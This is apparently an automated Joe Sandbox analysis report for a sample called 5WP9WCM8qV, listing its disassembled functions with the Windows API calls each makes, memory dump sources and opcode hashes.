Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Function 00405700 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
GetLastError.KERNEL32 ref: 00405714

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D

Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0

Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,000002CA,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768

Function 00405CDC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4

Function 00405CAD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Function 004022DF Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
Instruction ID: df176f915953132b0bb271560c482e71de85830ffa73b9ff1be2ff384974574c
Opcode Fuzzy Hash: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
Instruction Fuzzy Hash: 4AE04F30800208BBDF01AFA4CE49DBD3B79AF00344F14043AF940AB0D5E7F89A819749

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D

Function 00404165 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
Instruction ID: 76ab245bb7d1846facc95ba49394d78ca693920881c876aece34d531b1437416
Opcode Fuzzy Hash: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
Instruction Fuzzy Hash: 9EC09B717407007FDA118F60AD49F1777646B54741F1484397340F50E0C774E450D61C

Function 0040414E Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08

Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Function 0040413B Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F13), ref: 00404145

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 907d679711b6e1fb013299f82933437f2b692bd2f0f22f99d2ac99a58bd0a5b7
Instruction ID: 5fcfa7c36487df69233f4cfa323b79a9e92b7b04130a7d859801dd3b00291f76
Opcode Fuzzy Hash: 907d679711b6e1fb013299f82933437f2b692bd2f0f22f99d2ac99a58bd0a5b7
Instruction Fuzzy Hash: 2EA00275548601DBCE115B50DF45D057B61A7A47017514579A1855103486314461EB59

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 073d7dbc2332f78e70a8dd90dac9131f6f5b323190ef4269eb60dea87001c778
Instruction ID: da611c00f68309ce38524c53dd600884bbe3bd0769c2f60ab2efe4a782d3f0b5
Opcode Fuzzy Hash: 073d7dbc2332f78e70a8dd90dac9131f6f5b323190ef4269eb60dea87001c778
Instruction Fuzzy Hash: ADD0C977B141009BD710EFB9AE898AA73A8EB913293254837D902E50A2D578D801562C

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Non-executed Functions

Function 00404B30 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B48
GetDlgItem.USER32(?,00000408), ref: 00404B53
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
LoadBitmapW.USER32(0000006E), ref: 00404BB0
SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
DeleteObject.GDI32(00000000), ref: 00404C26
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
GetWindowLongW.USER32(?,000000F0), ref: 00404D61
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
ShowWindow.USER32(?,00000005), ref: 00404D80
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
ImageList_Destroy.COMCTL32(?), ref: 00404F50
GlobalFree.KERNEL32(?), ref: 00404F60
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
SendMessageW.USER32(?,00001102,?,?), ref: 00405082
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
ShowWindow.USER32(?,00000000), ref: 004050FF
GetDlgItem.USER32(?,000003FE), ref: 0040510A
ShowWindow.USER32(00000000), ref: 00405111

Strings

, xrefs: 004050E9
M, xrefs: 00404CDA
N, xrefs: 00404DBB

Memory Dump Source

Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
